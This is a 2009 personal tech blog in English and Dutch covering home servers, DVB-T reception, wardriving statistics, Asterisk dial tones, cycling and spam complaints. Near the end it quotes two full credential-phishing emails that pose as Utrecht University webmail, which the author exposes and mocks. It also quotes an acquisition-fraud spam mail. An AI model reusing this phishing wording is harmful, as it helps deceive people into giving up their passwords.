Sep  1 13:12:52 greenblatt sshd[24823]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:55 greenblatt sshd[24827]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:12:57 greenblatt sshd[24832]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:13:00 greenblatt sshd[24834]: Invalid user PlcmSpIp from 220.132.192.220
Sep  1 13:13:02 greenblatt sshd[24839]: Invalid user PlcmSpIp from 220.132.192.198
Sep  1 13:13:05 greenblatt sshd[24863]: Invalid user PlcmSpIp from 202.39.75.16
Sep  1 13:13:08 greenblatt sshd[24866]: Invalid user PlcmSpIp from 220.132.192.198

I rather have phones use tftp on a local network and/or http when chances are the setup will be remote.
Update 2009-09-02: And what do I find from someone who has actually configured this for provisioning his phones: Security issue related with PlcmSpIp someone who reports an actual visit on the PlcmSpIp account.

Not too many years ago I only used floppies for starting a system installation and in those cases it was always going through the box with floppies in the hopes of finding one that would successfully format, get the data written and keep it there long enough to boot the target system and get the installation running.

This evening I wanted to do a 'quick ubuntu install' on a harddisk in the server we use for demos of the hcc!pcgg netwerkgroep.

It's now finally installing using the third cd-rom drive. The one in the system did not even want to boot from the ubuntu installation cd, the second one worked ok and then moved and bumped into something while in use and started giving read failures on the same place on the cd while the cd verified fine in another system. The third one I found required a scsi controller, but the Adaptec 2940uw I had around is new enough to offer the option 'bootable cd', is now at least getting through the ubuntu cd-rom self test... and the installation worked. Sheesh. Maybe a pxeboot setup at home is a good idea, with at least a pxeboot version of the PLD rescueCD. But that would need a default do-nothing boot option because at least one client system insists on pxebooting even when it is disabled in the setup.

Wardriving results 13 July - 30 August: 3025 new networks with GPS locations according to the WiGLE stats. I'm still at number 14 at WiGLE. Not much wardriving due to the summer holiday.

Friday afternoon project: trying to make my Palm Tungsten E2 and my Ubuntu laptop talk IP to eachother. It took a bit of searching, but now it is working. It's one of those areas where one should not be afraid of a reboot, the incoming 'LAN access using PPP' kept being rejected until I rebooted the machine. Details added at The Dell Latitude D630 laptop and linux. The PalmOS webbrowser, Blazer, does show up with a weird user-agent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/Palm-Zir4; Blazer/4.0) 16;320x320"

Cat-5E cable helps, compared to Cat-5:

eth0: negotiated 1000baseT-HD flow-control, link ok

A new cable for 'connecting something in the living room'. The previous cable was Cat-5 and usually reverted to 100 megabit speed. But the switch and the computer support gigabit so I want that.

Power to the servers: I found out a certain type of 1U server uses 330 watt when fully busy. This is not a problem in itself but a lot of these together do strain the capacity of the UPS without taking up a lot of room. Solution: move systems around to save a bit of power.

Grappig: Introweb komt nu met een IPv6-only adsl aanbod voor een symbolische prijs van 6 euro per maand (dat is minder dan de KPN lijnhuur!). Ik heb al IPv6 via xs4all dus ik laat dit aanbod aan anderen die een goede reden hebben voor een gescheiden IPv6 uplink.

Rob O'Hara writes about part of his BBS history: Multiple Personalities - Rob O'Hara. Great story, I added my memories of the BBS days and how much energy could go into it.

This evening I decided to not stay indoors but to work in the garden a bit. The hazel tree (Nederlands: Hazelaar) needed some serious pruning as it grew a lot last spring. Using the saw I removed a number of 3 meter long branches. I had to stop because it became to dark to work but there still is some work left on the hazel tree. One branch was straight and long enough to keep it for my father-in-law. The rest will be sawed into pieces that fit the boxes we store the wood for burning in.

Zolangzamerhand heeft mijn Nazca Pioneer ligfiets wel z'n eigen pagina verdiend met daarin een overzicht van wat ik er aan onderhoud zelf aan doe.

Bezoekers aan mijn homepage zien al eventjes de IPv6 exhaustion counter in de rechterkolom .. wat verderop naar beneden. Met dank aan de onvolprezen Hurricane Electric voor hun IPv4 exhaustion counters.

Het is echt tijd dat meer mensen nadenken over IPv6 en er iets mee gaan doen. Vooral het netwerk tussen provider en thuisgebruiker heeft momenteel geen werkend IPv6, en daar moet nodig wat aan gedaan worden.

Recente publicatie: Wanneer krijgt IPv6 een gezicht? - Computable

Immediate confirmation of the Twitter rss feed issue: the rss feed did not parse. Indeed, the rss feed was not an rss but a piece of HTML:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd"> -->
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0.1">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<TITLE></TITLE>
</HEAD>
<BODY><P></BODY>
</HTML>

So the little script worked and saved the homepage.

More than one visitor of my homepage saw an intricate XML parsing error and not the page you all want to see. I never saw the problem myself but my best guess sofar is that the twitter rss feed was malformed, because that is the only XML parsing happening for the page. I fetch the twitter feed automatically every 6 hours, but sometimes twitter is a bit overloaded and probably gives an internal error page (the famous fail whale) and not the valid rss feed.

Solution: Fetch the file to a temporary file, run the parser on it and when the parser does not fail, copy it to where the webserver reads it:

#!/bin/sh

wget -O wwwdata/twitter.rss.pre -o /dev/null http://twitter.com/statuses/user_timeline/19301166.rss

perl -MXML::RSS -e 'my $rss=new XML::RSS; $rss->parsefile("wwwdata/twitter.rss.pre");'

if [ "$?" = "0" ]; then
	cp wwwdata/twitter.rss.pre wwwdata/twitter.rss
fi

Terug van vakantie! Korte samenvatting: we zijn met de trein naar Berlijn gereden en we zijn terug naar huis gefietst op de ligfietsen.

Een heerlijke vakantie. Veel dingen gezien. Berlijn is imposant, enorm veel geschiedenis overal in de stad. We hebben een beetje de muur-geschiedenis gezocht met een bezoek aan Museum Haus am Checkpoint Charlie wat al vanaf 1962 de geschiedenis van de muur volgt en de ontsnappingen uit Oost-Berlijn. We hebben een stukje van de Berliner Mauerweg gefietst. Indrukwekkend om het eens te zien. Ik heb in de jaren 80 wel het nieuws over West-Duitsland en Oost-Duitsland meegekregen en de Wende, maar ter plekke de streep door de stad te zien is toch wel anders. Vooral het stuk aan de Bernauer Straße waar ook een tentoonstelling is en nog een stuk muur te bezichtigen. Het blijft een totaal absurd gegeven hoe sterk gescheiden de stad was en hoeveel rare gevolgen daar van waren.

Het fietsen terug ging prima. Perfect weer, veel zon, twee keer een heel klein beetje regen. Wel een paar stevige buien op momenten dat wij lekker binnen zaten. Fietsen in Duitsland lijkt net op fietsen in Denemarken: soms moet je op de doorgaande weg fietsen (Landesstraße) en dat is dan gewoon geaccepteerd, auto's halen netjes in of blijven er even achter hangen als inhalen niet kan. Binnen 2 kilometer in Nederland waren we al ingehaald door iemand die dan 0.5 seconde eerder een erf kon opdraaien. Verder zijn er in Duitsland veel fietspaden en fietsroutes, in voormalig Oost-Duitsland minder, maar wel met een duidelijke groei. Ik had soms wel het idee dat het labeltje fietspad (Radweg) ook aan paden geplakt werd die alleen te fietsen zijn met een goeie mountainbike.

Ook onderweg bezocht: Bunker Kossa wat een oude bunker was van de Nationale Volks Armee, het leger van de DDR. Veel teksten in het russisch, maar eigenlijk viel het ons wel op dat in vergelijking met het Langelandsfort in Denemarken wat we vorig jaar bezocht hebben er een hoop overeenkomsten zijn tussen hoe de Navo-landen en de Warschaupact-landen dingen ingericht hadden.

In totaal 1246 kilometer gefietst deze vakantie, in 14 fietsdagen.

We hebben in Duitsland voor het bellen van onderdak wel gelijk een prepaid-sim gehaald van Klarmobil. Ooit was bellen met Vodafone in het land waar je was aardig goedkoop maar sinds het allemaal goedkoper moet met roaming en simpeler betaal je voor bellen naar Duitsland vanuit Duitsland gewoon het 'Passport' roaming tarief van EUR 0.79/gesprek en EUR 0.25/minuut. De Klarmobil Sim kostte EUR 9.95, gaf 10 euro tegoed en die rekenen EUR 0.09/minuut binnen Duitsland. Op vakantie neem ik zowiezo mijn oudere Nokia 6310i mee omdat die nu nogsteeds een betere batterij levensduur heeft dan mijn huidige toestel, een Nokia 6300.

Onderweg op de fiets zie ik nogal eens oude tv antennes op daken staan die duidelijk niet meer gebruikt worden (allemaal horizontaal gepolariseerd, terwijl alle dvb-t zenders in nederland verticaal gepolariseerd zijn). Misschien dat er daar nog eens eentje tussenzit die ik voor weinig kan meenemen voor meer DX experimenten. Of iemand moet een antenne weten? UHF / VHF band III.

The firewall at work got adjusted to not keep NAT state (cisco-term: xlates) for non-NAT sessions. So now I can run our ntp pool server at maximum speed again without the firewall overflowing its state tables. If you ever run into this problem, the right command is xlate-bypass.

Als je een aanbieding als World's Smallest Portable DVB-T Digital TV (2.4 Inch) ziet vraag je je af waarom KPN mobiele tv of Callmax / Mobiele TV Nederland uberhaupt nog zo moeilijk doen met een apart 'mobiel TV' aanbod via andere technische standaarden (KPN mobiel dvb-h, callmax en mobiele tv t-dmb). Mobiele TV is door internationale aanbieders van apparatuur allang gedefinieerd als kleine DVB-T ontvangers die FTA DVB-T kanalen ontvangen. Nu nog deze wijsheid bij de Nederlandse contentaanbieders en bij de frequentieverdelers.

Seeing another set of DVB-T DX pages by Hans makes me think I should have a look at parsing the vdr files from w_scan into an automatic DX logbook, noting when muxes are first found. I collected the output files since 3 January 2009. I started doing that after I saw the WDR program at 674 MHz so that was not logged in that format. Documentation: VDR file format.

Gisteren gingen we (lig) fietsen en bij het plannen van de route namen we een item van mijn foto wensenlijst mee: we zijn langs de Gerbrandytoren gefietst, bekend als zendmast Lopik te IJsselstein.

Gelukt.. Zendmast lopik te IJsselstein / Gerbrandytoren

Meer informatie over de Gerbrandy Toren: De Gerbrandytoren te IJsselstein Gerbrandytoren - Wikipedia Nederland
De zendmast is natuurlijk bekend van de rol als de grootste kerstboom van de wereld als aan het eind van het jaar de tuidraden voorzien worden van lampjes. Altijd in TV-gidsen gestaan als 'Lopik' maar door een gemeentelijke herindeling ooit van Lopik naar IJsselstein 'verhuisd'.
Ook leuk is om op te graven in de geschiedenis hoe hard Nederland 1, 2 en 3 ooit over ons uitgestrooid werden: het Nozema TV frequentieoverzicht uit 2002 geeft 100, 1000 en 1000 kiloWatt ERP (!). Dat gaat nu met 10 kiloWatt per DVB-T multiplex.

In the dvb-t scan yesterday evening late:

TV Gelderland :642000:I999B8C999D999M999T999G999Y999:T:27500:7041:7042:7043:0:1104:0:0:0
Radio Gelderland:642000:I999B8C999D999M999T999G999Y999:T:27500:0:7112:0:0:1111:0:0:0

Part of Digitenne bouquet multiplex 1 at 642 MHz. The transmitter could be Oss or Veenendaal given distance and transmitter power. I only noticed it yesterday but now I see it in the w_scan output a few times. The reception is not error-free (I had to wait a bit for a chance of a screenshot with not too much distortion).

No extra foreign channels from the dvb-t scans.. yet. I keep an eye on the tropospheric ducting forecast for northwest europe. I also updated the DVB experiments page with the DX results.

Bouquet or Multiplex? It is described as bouquet at DVB-T zenders Digitenne Nederland but the mpeg standard term for multiple program streams in one transport stream is 'multiplex'. Bouquet in DVB terms means a set of 'programs' logically grouped together.

Tijd om wat aan mijn ligfiets te doen: het stuur was verbogen geraakt, vermoedelijk als gevolg van een harde val. Het nadeel van aluminium: daar buig je weinig aan terug. Maarja, het is zoveel lichter. Ik heb op Cycle Vision een praatje gemaakt met de mensen van Nazca Ligfietsen en die konden heel snel een vervangende stuurbocht opsturen. Mijn vraag was natuurlijk hoe ik het stuur uit elkaar moest halen, vooral de (de)montage van de bar-end shifters was me niet duidelijk. Bij de Shimano techdocs site kon ik de gewenste documentatie en tekeningen vinden, en toen was het ineens allemaal wel duidelijk. Stuur gedemonteerd, alle tie-wraps er af, oude stuurbocht eruit, nieuwe stuurbocht er in en weer alles gemonteerd. Ik denk alleen dat ik voor de vakantie ook nog remkabels wil vervangen. Het is wel een lekker gevoel om je eigen fiets gerepareerd te hebben.

I redid a bit of pictures.idefix.net and made a few extra collections public that are public anyway. Now for the wish-list of pictures to take...

What you don't want to see in your data center: Photos: Inside the Fisher fire - Techflash. One interesting effect from that fire was: TV station forced to go old school after fire at Seattle's Fisher Plaza. Found via The Risks Digest.

Time for some website programming: Amazon was notifying me that Amazon 'Product Advertising API' requests (formerly known as Amazon Web Service) now need to be digitally signed. The 'why' of this is probably something with security. For the 'how' I had to revive those braincells which once programmed Amazon Web Service into The Virtual Bookcase. Those braincells took time as I was first browsing in the wrong sourcefiles. But, after having a peek at Jaap's free Amazon PHP Scripts and incorporating the change to sign requests into my sources, I found the right way again.

One of those times I am glad I have a development version of the site (smaller database, code in development), a qa version (production database, candidate code) and a running version (production database, production code) to test changes like this. The visitors of The Virtual Bookcase never saw all the tries in getting the code to work right.

It was a while since I did any serious work on that site. Otherwise it runs on autopilot and I only add new books and reviews from time to time. Ok, the income from the site has dropped in the same way.

Aankondiging vandaag in xs4all.general: Tour de France via IPv6. Streaming via IPv6, het kan... voor xs4all klanten. Goed om te zien dat omroep.nl weer actief is met innovatie. Net als een vorig experiment (Nederland 1 HD via multicast) wordt het pas aangekondigd als het evenement al een aardig stuk onderweg is, wat meer met rechten te maken heeft dan met de techniek.
Update : De stream met beeld is alleen beschikbaar tijdens de etappe overdag en tijdens de 'avondetappe'. De radio1 stream doet het de hele tijd, die heb ik dus al succesvol beluisterd vanaf thuis.

Wardriving results 22 June - 12 July : 829 new networks with GPS locations according to the WiGLE stats. The only special wardrive was a ride together with another wardriver to Enschede. I had the 802.11a scanning enabled, he had a different antenna type.

Some websearching suggests my headaches with mISDN could be solved by using the qozap driver which I get when I compile zaptel-sources. Just a bit of configuring asterisk differently... time to find some time for that somewhere.

Yesterday evening I installed a 6-tape DDS-3 changer in the homeserver greenblatt and activated the latest ubuntu kernel updates. The tape changer works great but the mISDN drivers got confused because the 'loading drivers' stage at boot loads them without the right parameters which results in confused drivers (hardware not found) which I can't unload because that causes a kernel panic. Workaround: remove the mISDN drivers, reboot the system, reinstall the mISDN drivers and let /etc/init.d/mISDN load the drivers in the correct way.

I caught the Omroep Brabant logo last night: after dark reception is a lot better! The Digitenne B1 bouquet at 546 MHz and Digitenne B2 at 786 Mhz scanned fine.

I took some pictures of the log-periodical antenna which improved the reception of dvb-t stations in the area and updated the DVB experiments page with them. A big thankyou to Alan Yates for doing the calculations for the UHF log-periodic antenna which has been built by several other hobbyists.

Het artikel Regering dreigt digitale (ether)televisiemarkt te verstikken van David de Jong geeft aardig weer wat er mis is met de televisiemarkt in Nederland. Ik heb er zelf mijn commentaar nog aan toegevoegd dat ik veel meer zie in mogelijkheden voor free-to-air lokale omroepen via dvb-t dan voor dvb-h (mobiel TV) wat eigenlijk voor een deel een kopie is van wat er al via dvb-t gedistribueerd wordt. Ja, Nederland is een land met heel veel buren die ook iets willen en heeft dus maar heel beperkte frequentieruimte. Maar dat alleen maar gebruiken voor mobiele telefonie is jammer.

Het is een regenachtige dag vandaag, maar de neerslagradar van het KNMI heeft momenteel geen data, en buienradar.nl is maar naar de backup-methode overgeschakeld, zo te zien duitse radar. Op de webcam zijn de buien te zien die voorbij trekken.

Afgelopen weekend zijn we op Cycle Vision 2009 geweest. Een evenement van de Nederlandse Vereniging voor Human Powered Vehicles. Ik ging daar vooral heen om te fotograferen. Een internationaal gezelschap van ligfietsers die in diverse evenementen competitie streden leek me wel kans te geven op mooie plaatjes. Na een selectie uit de overvloed die op de geheugenkaarten stond: Cycle Vision 2009 Tilburg.
Ik ben zelf erg tevreden over deze: handbike tijdens uursrace Cycle Vision 2009 Tilburg

Nice sample in the spam of what is in Dutch called acquisitiefraude (aquisition fraud?). Trying to make companies pay for being in some 'register' where nobody looks. From the spam e-mail:

In order to have your company inserted into the registry of World Company Directory for 2009/2010, please print, complete and return the enclosed form (PDF file) to the following address:

With the detail:

Updating is free of charge!

Well, updating may be free, insertion isn't when reading the small print in the PDF:

I HEREBY ORDER A SUBSCRIPTION WITH SERVICE PROVIDER WORLD BUSINESS DIRECTORY LTD. I WILL HAVE AN ENTRY INTO ITS DATABASE FOR THREE YEARS. THE PRICE PER YEAR IS EUR 980.

Spammers and frauds nicely working together, not a surprise.

"World Company Directory" melding bij steunpunt acquisitiefraude

The log-periodical antenna has effect: a number of signals show workable data in w_scan. New:

490 MHz - Digitenne B3 from probably Lelystad
514 MHz - Digitenne B1 from Lelystad, including TV Flevoland / Radio Flevoland
682 MHz - Digitenne B4 from Lelystad

And with aiming and trying (3 windows with dvbsnoop for pid 0x00, 0x10 and 0x11, one window with tzap reading the signal strength):

546 MHz - Digitenne B1 including Omroep Brabant, source unknown

Updated the DVB experiments page with the latest findings. Time to take pictures of the antenna I built.

So, who is this nobody user anyway? Porting account-management scripts from Centos linux to ubuntu made strange problems show. A short check found interesting differences. After asking around on irc and trying some things I found quite a choice:
Centos linux:

nobody:x:99:99:Nobody:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

Ubuntu linux:

nobody:x:65534:65534:nobody:/nonexistent:/bin/sh

FreeBSD 6.1:

nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin

Solaris:

nobody:x:60001:60001:Nobody:/:

Interesting is that creating a file as root on a solaris nfs client will create it as 65534:0. Data Ontap:

pw_name = nobody
pw_passwd = 
pw_uid = 65535, pw_gid = 65535

First success with the self-built antenna: I tried it in the 'home office', approximately 5 meters above ground, north-east direction. With the log-periodical antenna pointing outside through the window I was able to receive Digitenne bouquet 1 at 618 MHz UHF, which includes radio and TV Noord-Holland.

A spammer on the block named Facebook. And I'm not talking about spamming in facebook, I'm talking about spam from facebook in my mailbox, disguised as an 'invitation'. From the e-mail:

I set up a Facebook profile where I can post my pictures, videos and events and I want to add you as a friend so you can see it. First, you need to join Facebook! Once you join, you can also create your own profile.

PREMIER SITE DE RENCONTRE 100% GRATUIT. chat,envoie de mails,inscription,photos, envoie de vos coordonnées personnel aux autres membres .......tous les services sont GRATUITS sur notre site de rencontre

Some French-language website (on facebook? redirecting somewhere else? I have to register with facebook to find out: no way). And, at the bottom:

******@ruu.nl was invited to join Facebook by Azza Ava. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.

That e-mail address points at a role-account here (and given the fact that the @ruu.nl version is used means a really old spammer list is used too). So it has never been subscribed to anything from Facebook. No need to unsubscribe, this is pure spam. According to whois for the sender-IP:

NetRange:   69.63.176.0 - 69.63.191.255 
CIDR:       69.63.176.0/20 
OriginAS:   AS32934
NetName:    TFBNET2
NetHandle:  NET-69-63-176-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS04.SF2P.TFBNW.NET
NameServer: DNS05.SF2P.TFBNW.NET
Comment:    Contact abuse@facebook.com with issues.
RegDate:    2007-02-07
Updated:    2009-03-04

I am not fully convinced their abuse department is going to change their system not to annoy random e-mail accounts with invitation-spam. Time to notify uplink providers too that there is a spammer in the house.
Update: the nice autoreply from abuse at facebook tells me all about privacy on facebook and stuff like that. Bzzzzt, wrong answer! I'm from the non-facebook world and I don't want your invitations. I'll discuss this with your uplink providers. They have the wire-cutters to really deal with the problem.
Update^2: According to the facebook abuse department the mail was faked and not really from facebook. I disagree: the headers show an outgoing facebook mail server.

Ooit, lang geleden toen ik nog het blad Computer!Totaal onvermijdelijk kreeg bij het HCC lidmaatschap heb ik op het bijbehorende forum begin 2004 wat reacties gepost over artikelen. Vandaag kreeg ik om 13:03 ineens e-mail op het adres van de forum registratie over het Grote Merkenonderzoek van ComputerTotaal.
Daar was die forumregistratie niet voor, dus ik volg gelijk de link om geen e-mail meer te ontvangen, een typische link met cryptografische hash. Op de site (waar het goeie e-mail adres staat, dus de link was inderdaad gepersonaliseerd) blijken 4 categorieën te zijn waarin je e-mail kunt krijgen waarvan 2 aangevinkt. Ik wilde niets meer te maken hebben met Computer!Totaal of IDG dus heb ik ze gelijk uitgevinkt. Dan krijg je een nieuwe link in je e-mail om die wijzigingen te bevestigen.. waarom? Zijn ze bang dat iemand anders de link misbruikt om hun e-mail te stoppen? Een beetje overkill na die eerdere link met cryptografische hash. Die bevestiging natuurlijk gedaan om 13:24.
Vervolgens krijg ik om 16:01 weer mail, dit keer voor het 'Tips & Trucs forum' wat graag een nieuwsbrief kwijt wil. De link om mijn 'voorkeuren voor het onvangen van e-mail van Tips & Trucs te wijzigen' levert op dat daar weer 4 categorieën zijn waarvan 2 aangevinkt. Dus nog meer spam e-mail uit die hoek.
Dan vraag ik het niet meer lief, blijkbaar zijn Computer!Totaal / IDG uitgevers / Tips & Trucs gewoon spammers. Ok, daar kan ik gewoon een klacht over indienen, dat is ook een stuk minder werk.

Wardriving results 13 June - 21 June: 2004 new networks with GPS locations.

Several times when I scanned for DVB-T signals in the UHF band from home I saw some very weak signals on several frequencies. Too weak to make out anything other than that the signals are very probably DVB-T as the radio scanner does not pick up a thing there (for as far as I know FM receivers cannot pick up QAM signals). The DVB-T receiver I use has a small external antenna (simple half-wavelength wire), so to get more signals I will have to use a good antenna. Buying something is expensive and it is to me much more interesting to build something myself from scrap materials. Most promising seems to be Alan Yates' Laboratory - UHF Log-Periodic Array so I'm browsing my scrap electronics for materials to build this.

The empty slot I found before in a dvb service scan where BemBem used to be is now:

0x0000 0x0072: pmt_pid 0x0474 Digitenne -- 100%NL (running, scrambled)

As reported by radio-tv-nederland.nl.

Just heard on the scanner on one of the air traffic channels: "Request for sightseeing the Amsterdam Schiphol sector" describing (I think) the plane as a Cessna. It must be Sunday :)

The lightning detector had another active night.. and this time I slept right through it. Nothing like the high numbers on 26 May 2009 but still a peak.

So, the US is now also switched over to digital television. I found a nice compilation of analog shutdowns on youtube: 2009 DTV Transition: Analog TV Shutoffs in Los Angeles As They Happened and one particular WABCEndsAnalogShrtVrs061209 from ABC channel 7 New York. Some stations made a nice item out of it with a countdown and some just dropped their analog signal in the middle of a program. One big thing in the US is a lot of TV channels use their channel number in their branding (like ABC 7 for WABC above) and the US brother of DVB-T named ATSC has provisions for channels 'named' with a number which is not equal to the VHF/UHF frequency.
Update: Journal entry describing the end of analog tv broadcast: uneventful

Vandaag in het nieuws: Privacy ondergeschikt in paspoortwet - De Volkskrant : er is een nieuwe paspoortwet geaccepteerd door zowel de tweede als eerste kamer die enorme gevolgen heeft voor de privacy zonder dat het Malieveld heeft volgestaan met demonstranten. Terwijl de inhoud van dit wetsvoorstel volgens mij wel alle aanleiding geeft tot demonstraties aan de ene kant en serieuze vragen waarom de Nederlandse wetgever zich niet aan de Nederlandse grondwet wil houden aan de andere kant. Helaas hebben we in Nederland (nog) geen constitutioneel hof wat de wetgever op de vingers kan slaan. Uit het artikel

Alle Nederlanders boven de 14 jaar komen met hun vingerafdrukken, foto, sofi- of BSN-nummer in één databestand. Een bestand dat vrij toegankelijk is voor de inlichtingendienst en onder voorwaarden kan worden ingezien door justitie en politie.

Onder voorwaarden is natuurlijk waar het eerste aan getrokken gaat worden. Binnen de kortste keren zit elke rechercheur er ongestoord in te grasduinen.

Juist op de 80e geboortedag van Anne Frank moet iedereen zich toch realiseren wat een enorme gevaren voor de vrijheid van iedere Nederlander uitgaan van een dergelijk databestand. De enige manier om zo'n bestand te beschermen tegen misbruik is het niet aan te willen leggen.

De vraag is: als het gaat om veiligheid in Nederland, wie beschermt ons tegen de overheid?

Wardriving results 2 June - 12 June: 1509 new networks with GPS locations. I am now at position 14 in the WiGLE stats with currently 163418 new networks with GPS locations found.

Wat perl code om met Chipcard::PCSC het saldo en de laatste 5 transacties van een chipknip uit te lezen. Altijd handig als je toevallig een laptop met chipcard slot hebt. Het leuke is dat je ook kan zien wat het eigen nummer was van de chipautomaat waar je de transactie deed (SAM_ID) en het volgnummer (SAM_STAN) waarmee je kan zien waar je chipknip geweest is en kan zien hoeveel transacties automaten te verwerken krijgen. Perl code om een chipknip saldo te lezen en de laatste transacties.

Why go through all the trouble of installing a hardware skimming device when the ATM runs Microsoft Windows XP? Cybercriminals refine data-sniffing software for ATM fraud - Network World. This is scary stuff. This means an ATM which fully looks like the real thing and has no glued-on extensions can still be compromised.

A wonderful image of how the times are changing: the Hollywood Sign is still basically the same as in 1923 (it has been 'Hollywoodland' until 1949). But the drum antennas in the back are a sign of the new times were digital communications change the media landscape and threaten the old business models that Hollywood hangs on to.
Image from Hollywood Sign Wikimedia Commons. Found via Study: P2P customers are Hollywood's best friends—really! - Ars Technica

Computers are better at... doing what you program to, not what you want. There is still an older computer running which once hosted my mailman mailinglists for several domains. I shut down mailman on that machine and migrated the lists. But mailman was never removed from the startup files and the machine rebooted today, resulting in three years of mailman monthly reminders mailed at once. So if you were looking why you got old mailman reminders from virtualbookcase, this is why.

The Hurricane Electric IPv6 tunnelbroker is now also part of the Google over IPv6 project. Clients can access google services over IPv6:

koos@apollo:~$ host www.google.com 2001:470:20::2
Using domain server:
Name: 2001:470:20::2
Address: 2001:470:20::2#53
Aliases: 

www.google.com is an alias for www.l.google.com.
www.l.google.com has address 74.125.39.105
www.l.google.com has address 74.125.39.104
www.l.google.com has address 74.125.39.147
www.l.google.com has address 74.125.39.103
www.l.google.com has address 74.125.39.99
www.l.google.com has address 74.125.39.106
www.l.google.com has IPv6 address 2001:4860:a003::68

Go Hurricane Electric!

Wardriving results 19 May - 1 June: 4284 new networks with GPS locations. I got up to position 14 in the WiGLE stats. I've taken the wardriving box on a few detours on the home - work route and it went along on a few nice recumbent bicycle rides we did around the city.

Met de correcte frequenties voor de eerste en tweede kiestoon heb ik nu een Asterisk simulator Nederlandse telefooncentrale (voor 1995) geschreven. Dat heeft me wat over de beperkingen van Asterisk en vooral de functie WaitExten geleerd. Maar hij doet het!

After finding out the hopefully correct frequency for the old Dutch first and second dialtone in the Netherlands I tried to implement a simulator for making calls in the style of an old Dutch phone exchange (although I can't simulate the clicks and background noises.. yet). This made some downsides of the Asterisk extensions.conf 'programming' language show. But, after some grumbling and testing and testing I think I found the right way.

Goed idee: HackdeOverheid. Ik heb in ieder geval wel wat ideetjes over hoe de gemeente Utrecht meer gegevens beschikbaar kan stellen en hoe burgers daar creatieve dingen mee kunnen.

De tweede kiestoon is gevonden! Dankzij het museum voor communicatie en een vrijwilliger daar.

De eerste kiestoon bestond vroeger uit een combinatie van 150 Hz en 450 Hz.
De 2e kiestoon was 450 Hz bij electromechanische systemen en 425 Hz bij computerbestuurde centrales.
Bij het vervallen van de tweede kiestoon op 10-10-1995 bestonden geen electromechanische centrales meer en is de frequentie van de tweede kiestoon gebruikt voor de kiestoon.

Dus als ik dat wil nabouwen in Asterisk krijg ik iets in indications.conf als:

[nl-old]
description = Netherlands before 10-10-1995
ringcadence = 1000,4000
dial = 150+450
; second dial tone after area code
seconddial = 450
busy = 450/500,0/500
ring = 450/1000,0/4000
congestion = 450/250,0/250
info = 950/330,1400/330,1800/330,0/1000
stutter = 450/500,0/50

en moet ik Playtones(seconddial) gebruiken.
Update : En nu heb ik 2 andere meningen dat de eerste kiestoon alleen 150 Hz was.

Vandaag weer phishing mail in krom Nederlands, maar met het beter lopende Engelstalige origineel er vlak achter. Dat maakt vergelijken leuk:

Subject: UNIVERSITAIR UTRECHT WEBMAIL: Werk Uw E-mai lRekening bij

De beste E-mail Gebruiker,

 om uw proces van de Controle van de Rekening te voltooien, u moet
antwoorden en dit bericht uw Gebruikersbenaming en Wachtwoord
respectievelijk in de ruimte ingaan die onder deze e-mail wordt
verstrekt. U moet dit vóór volgende 48hrs van ontvangstbewijs van deze
e-mail doen, of uw postRekening zal van ons Gegevensbestand worden
gedesactiveerd en worden gewist. Uw rekening kan ook worden
geverifi�ërd bij:

gaat Gebruikersbenaming in (         )
Ga Wachtwoord in (         )

Dank u voor het gebruiken van UNIVERSITAIR UTRECHT WEBMAIL

versus

Subject: UNIVERSITY UTRECHT WEBMAIL : Update Your Email Account

Dear E-mail User,

To complete your Account Verification process, you are to reply  this
message and enter your Username and Password respectively in the space
provided below this email.You are required to do this before the next
48hrs of  receipt of this e-mail, or your mail Account will be
de-activated and erased from our Database. Your account can also be
verified at:

Enter Username (         )
Enter Password (         )

Thank you for using  UNIVERSITY UTRECHT WEBMAIL

Iemand enig idee welke automatische vertaler dit gedaan kan hebben?

In het kader van het Collectors*Net spelen met oude telefoons vroeg ik me af: wat was de toonhoogte van de oude 2e kiestoon in Nederland (die je ooit kreeg na het draaien van het netnummer). Weet iemand nog wat de frequentie was van die 2e kiestoon? Het wikipedia artikel over telefoontonen geeft wel een plaatje van een toon maar aangezien de gewone kiestoon daar weergegeven wordt als een 440 Hz (A) terwijl het 425 Hz is denk ik niet dat de frequentie van die E correct is.
Update 2009-05-29: Gevonden! De correcte eerste en tweede kiestoon

In the category spammers will try anything that looks like an e-mail address I repeatedly find variations on this message in the system logs:

greenblatt sm-mta[12385]: n4RAsgSa012385: <8006@idefix.net>... No such user in domain

Where they get that idea? Simply: On the Asterisk podcast per telefoon page is a sip url for sip:8006@idefix.net. It looks like an e-mail address: spam it!

When I bought some 1-wire sensors a while ago at Hobby boards I included the lightning detector in the order. I installed it indoors in the attic where it also counts the switch of the fluorescent lights, so it will probably work better in an outdoor weather station further away from interference. But, in the early hours of today there was a heavy thunderstorm over this country and it counted like crazy. The stated sensitivity is about 80 kilometers:

this lightning detector will be able to pick up lightning more than 50 miles away

With the 75000 lightning strikes reported in the Netherlands for that night, the numbers don't look that strange.

Remember way back windows 95 / 98 reporting "Windows was shutdown incorrectly" after you had to reset it for the Nth time because it crashed or hung?

I was reminded of this today when I wanted to remove a USB disk from a server so I tried to use the "Safely remove hardware" tool which did nothing. When I gave up and just unplugged the disk the warning window jumped up telling me to use the 'Safely remove hardware' tool to do that.

Annoying.

Ik zag van het weekend dat er weer een duif zit te broeden in de conifeer voor het raam van onze werkkamer. Het leek me wel leuk om tijdelijk een uitbreiding te maken voor mijn webcam site zodat iedereen het nest kan volgen zoals Vogelbescherming Nederland ook doet met hun Beleef de lente project. Helaas, geen werkende extra webcam beschikbaar. De extra webcam op het werk geeft rare usb errors en weigert.

